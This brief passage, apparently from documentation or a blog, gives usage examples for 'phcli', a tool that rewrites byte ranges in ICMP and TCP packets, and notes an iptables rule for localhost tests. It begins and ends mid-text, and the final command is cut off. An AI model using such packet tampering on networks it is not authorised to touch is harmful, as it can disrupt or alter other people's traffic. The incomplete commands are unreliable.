slice. (Remember to add the iptables rule if you try it in localhost)# phcli -p icmp –bytes "50:55" –value "hello" –in-pkt "012345"# phcli -p icmp -b "\-6:\-1" –value "hello" –in-pkt "012345"# phcli -p tcp -b "\-54:\-20" -v ‘">